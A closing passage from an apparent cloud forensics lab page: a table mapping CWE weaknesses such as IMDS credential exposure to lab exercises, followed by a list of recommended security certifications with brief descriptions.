| CWE-200 | Exposure of Sensitive Information | Ex. 2, 3 (IMDS credential exposure) |
| CWE-778 | Insufficient Logging | Ex. 5 (anti-forensics detection gaps) |
| CWE-269 | Improper Privilege Management | Ex. 3 (Managed Identity overscoped) |
| CWE-306 | Missing Authentication for Critical Function | Ex. 2 (IMDSv1 no token required) |
Advance Your Career¶
Recommended Certifications
This lab covers objectives tested in the following certifications. Investing in these credentials validates your cloud forensics and incident response expertise:
| Certification | Focus | Link |
|---|---|---|
| GIAC GCFE -- Certified Forensic Examiner | Digital forensic evidence acquisition, chain of custody, filesystem and artifact analysis | Learn More |
| GIAC GCFA -- Certified Forensic Analyst | Advanced forensic analysis, memory forensics, timeline analysis, threat hunting | Learn More |
| GIAC GCFR -- Cloud Forensics Responder | Cloud evidence collection, AWS/Azure forensics, cross-cloud incident response | Learn More |
| CompTIA CySA+ (CS0-003) | Security operations, threat detection, vulnerability management, and incident response | Learn More |
| CompTIA CASP+ (CAS-004) | Advanced security architecture, engineering, cloud security operations | Learn More |
| AWS Security Specialty (SCS-C02) | AWS security services, infrastructure protection, identity management, data protection | Learn More |
| Azure Security Engineer Associate (AZ-500) | Azure identity, platform protection, security operations, data and application security | Learn More |
| SC-200 -- Microsoft Security Operations Analyst | Sentinel, KQL detection engineering, incident investigation, threat hunting | Learn More |